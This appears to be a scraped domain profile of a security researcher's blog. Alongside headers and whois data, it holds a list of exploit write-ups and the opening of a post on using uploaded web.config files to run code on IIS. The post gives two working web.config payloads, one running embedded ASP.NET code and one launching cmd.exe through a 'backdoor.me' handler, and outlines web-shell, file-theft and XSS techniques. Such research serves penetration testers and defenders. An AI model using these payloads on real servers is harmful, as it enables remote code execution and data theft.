secproject.com: Soroush Dalili (@irsdl) – سروش دلیلی | Web AppSec ninja, a semicolon enthusiast!

secproject.com Profile

Sub Domains: soroush.secproject.com

Title: Soroush Dalili (@irsdl) – سروش دلیلی | Web AppSec ninja, a semicolon enthusiast!

Description: Soroush Dalili (@irsdl) – سروش دلیلی Web AppSec ninja, a semicolon enthusiast! Menu Skip to content Home Advisories Privacy Policy My MDSec Blog Posts so far in 2020! Lately I have only pub

secproject.com Information

Website / Domain: secproject.com
HomePage size: 142.363 KB
Page Load Time: 0.262293 Seconds
Website IP Address: 104.31.92.124
ISP Server: CloudFlare Inc.

secproject.com IP Information

IP Country: Singapore
City Name: Singapore
Latitude: 1.2896699905396
Longitude: 103.85006713867

secproject.com Httpheader

Date: Sat, 26 Dec 2020 03:29:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Vary: Accept-Encoding,Cookie
Link: https://soroush.secproject.com/blog/wp-json/; rel="https://api.w.org/"
CF-Cache-Status: DYNAMIC
cf-request-id: 073eb16d4c00003e1531220000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: "endpoints":["url":"https:\\/\\/a.nel.cloudflare.com\\/report?s=Y1EeQeTs7tV9fH4ZHiTnlbwUcI%2F%2BbpySrVZZwLUKyAUVJdUGPizu14fadtlyZtrZ5%2FRYvYxYHWZynTGTv6ReuaYnHVRX%2BUkBCQeNP%2BaALjkEd41S1oLJP0QFACFGSyOYeplE"],"group":"cf-nel","max_age":604800
NEL: "report_to":"cf-nel","max_age":604800
Server: cloudflare
CF-RAY: 6077b8287d1a3e15-EWR
Content-Encoding: gzip

secproject.com Meta Info

<meta charset="utf-8"/>
<meta content="width=device-width" name="viewport"/>
<meta content="WordPress 5.5.3" name="generator"/>

secproject.com Similar Website

Domain | Website Title
secproject.com | Soroush Dalili (@irsdl) – سروش دلیلی | Web AppSec ninja, a semicolon enthusiast!
soroush.secproject.com | Soroush Dalili (@irsdl) – سروش دلیلی | Web AppSec ninja, a semicolon enthusiast!

secproject.com Html To Plain Text

Soroush Dalili (@irsdl) – سروش دلیلی
Web AppSec ninja, a semicolon enthusiast!

My MDSec Blog Posts so far in 2020!

Lately I have only published blog posts through the MDSec website. I thought it might be a good idea to link what I have published so far here as well:

- Covert Web Shells in .NET with Read-Only Web Paths
- Analysis of CVE-2020-0605 – Code Execution using XPS Files in .NET
- Introducing YSoSerial.Net April 2020 Improvements
- A Security Review of SharePoint Site Pages
- CVE-2020-0618: RCE in SQL Server Reporting Services (SSRS)
- Code injection in Workflows leading to SharePoint RCE (CVE-2020-0646)

COVID-19 has sadly affected many if not all of us. I hope everyone remains safe and we can all carry on the normal life we had before this crisis. Hopefully I can then publish more blog posts here as well.

This entry was posted in My Advisories, Security Posts and tagged .Net Framework, asp.ne, code injection, covid-19, deserialisation, deserialization, Exploit, mdsec, sharepoint, ssrs, weblogs, website vulnerability, workflows, xps, ysoserial.net on October 31, 2020 by Soroush Dalili.

File Upload Attack using XAMLX Files

I have recently published a blog post on use of .XAMLX files to execute command on an IIS based application. This blog has been published by NCC and is accessible here: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/august/getting-shell-with-xamlx-files/

Here is its little Twitter story:

And here we go https://t.co/KTVukFkFn6 – that was fast @NCCGroupInfosec! Thanks :) — Soroush Dalili (@irsdl) August 23, 2019

This technique can come in handy when dealing with a file uploader that uses a blacklist approach to stop malicious extensions. Interestingly, if you just search XAMLX in Google or Bing, this technique will be in the first page so it has taken over so many of its actual legitimate usage!
This entry was posted in Security Posts and tagged file upload, file upload bypass, file uploader security bypass, IIS File Extension Security Bypass, Unrestricted File Upload, xaml, xamlx on September 21, 2019 by Soroush Dalili.

Uploading web.config for Fun and Profit 2

Table of Contents:

Introduction
1. Execute command using web.config in the root or an application directory
   1.1. Executing web.config as an ASPX page
   1.2. Running command using AspNetCoreModule
   1.3. Using Machine Key
   1.4. Using JSON_AppService.axd
2. Execute command using web.config in a subfolder/virtual directory
   2.1. Abusing the compilerOptions attribute
      2.1.1. Creating a web shell
      2.1.2. Taking over existing ASPX files
      2.1.3. Stealing internal files
      2.1.4. Stealing more data about the app
   2.2. Taking over existing/uploaded .NET files
   2.3. Stored XSS
      2.3.1. Using StateApplication handler
      2.3.2. Using DiscoveryRequestHandler handler
3. Prevention techniques
4. Behind the scene
   4.1. Requirements and resources
   4.2. Compiler options
   4.3. Exploring new handlers
      4.3.1. Handlers limit in a subfolder
   4.4. Temporary and compiled files
5. References

Introduction

This is the second part of my Uploading web.config For Fun and Profit! I wrote the original blog post back in 2014 [1] in which I had described a method to run ASP classic code as well as performing stored XSS attacks only by uploading a web.config file.

In this blog post, as well as focusing on running the web.config file itself, I have covered other techniques that can come in handy when uploading a web.config in an application on IIS. My main goal is to execute code or commands on the server using a web.config file and have added more techniques for stored XSS as well.

The techniques described here have been divided into two major groups depending on whether a web.config file can be uploaded in an application root or in a subfolder/virtual directory.
Please see [2] if you are not familiar with virtual directory and application terms in IIS. Another blog post of mine can also be helpful to identify a virtual directory or an application during a blackbox assessment [3].

1. Execute command using web.config in the root or an application directory

This method can be very destructive where an application already uses a web.config file that is going to be replaced with ours which might not have all the required settings such as the database connection string or some valid assembly references. It is recommended to not use this technique on live websites when an application might have used a web.config file which is going to be replaced. IIS applications that are inside other applications or virtual directories might not use a web.config file and are generally safer candidates than website's root directory. The following screenshot shows an example of an internal application anotherapp inside the testwebconfig application which is also inside the Default Web Site.

There are many methods that can be used to execute commands on a server if the web.config file within the root directory of an application can be modified. I have included four interesting examples in this blog post which are as follows.

1.1. Executing web.config as an ASPX page

This is very similar to [1] but as we are uploading a web.config file within the root directory of an application, we have more control and we can use the managed handlers to run a web.config file as an ASPX page.
The following web.config file shows an example:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <system.webServer>
        <handlers accessPolicy="Read, Script, Write">
          <add name="web_config" path="web.config" verb="*" type="System.Web.UI.PageHandlerFactory" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />
          <add name="web_config-Classic" path="web.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />
        </handlers>
        <security>
          <requestFiltering>
            <fileExtensions>
              <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
              <remove segment="web.config" />
            </hiddenSegments>
          </requestFiltering>
        </security>
        <validation validateIntegratedModeConfiguration="false" />
      </system.webServer>
      <system.web>
        <compilation defaultLanguage="vb">
          <buildProviders>
            <add extension=".config" type="System.Web.Compilation.PageBuildProvider" />
          </buildProviders>
        </compilation>
        <httpHandlers>
          <add path="web.config" type="System.Web.UI.PageHandlerFactory" verb="*" />
        </httpHandlers>
      </system.web>
    </configuration>
    <!-- ASP.NET code comes here! It should not include HTML comment closing tag and double dashes!
    <%
    Response.write("-"&"->")
    ' it is running the ASP code if you can see 3 by opening the web.config file!
    Response.write(1+2)
    Response.write("<!-"&"-")
    %>
    -->

It is then possible to browse the web.config file to run it as an ASP.NET page. Obviously the XML contents will also be accessible from the web. Perhaps it is just easier to upload another file with an allowed extension such as a .config, .jpg or .txt file and run that as a .aspx page.

1.2. Running command using AspNetCoreModule

It is also possible to run a command using the ASP.NET Core Module as shown below:

    <?xml version="1.0" encoding="utf-8"?>
    <configuration>
      <system.webServer>
        <handlers>
          <remove name="aspNetCore" />
          <add name="aspNetCore" path="backdoor.me" verb="*" modules="AspNetCoreModule" resourceType="Unspecified" />
        </handlers>
        <aspNetCore processPath="cmd.exe" arguments="/c calc"/>
      </system.webServer>
    </configuration>

The stated command would be executed by browsing the backdoor.me page which does not need to exist on the server! A PowerShell command can be used here as an example...

secproject.com Whois

"domain_name": "SECPROJECT.COM",
"registrar": "GoDaddy.com, LLC",
"whois_server": "whois.godaddy.com",
"referral_url": null,
"updated_date": [ "2017-10-21 17:43:21", "2016-07-15 12:40:18" ],
"creation_date": "2008-12-14 19:42:47",
"expiration_date": "2021-12-14 19:42:47",
"name_servers": [ "ALINA.NS.CLOUDFLARE.COM", "ART.NS.CLOUDFLARE.COM" ],
"status": [
  "clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited",
  "clientRenewProhibited https://icann.org/epp#clientRenewProhibited",
  "clientTransferProhibited https://icann.org/epp#clientTransferProhibited",
  "clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited",
  "clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited",
  "clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited",
  "clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited",
  "clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited"
],
"emails": [ "abuse@godaddy.com", "SECPROJECT.COM@domainsbyproxy.com" ],
"dnssec": "unsigned",
"name": "Registration Private",
"org": "Domains By Proxy, LLC",
"address": [ "DomainsByProxy.com", "14455 N. Hayden Road" ],
"city": "Scottsdale",
"state": "Arizona",
"zipcode": "85260",
"country": "US"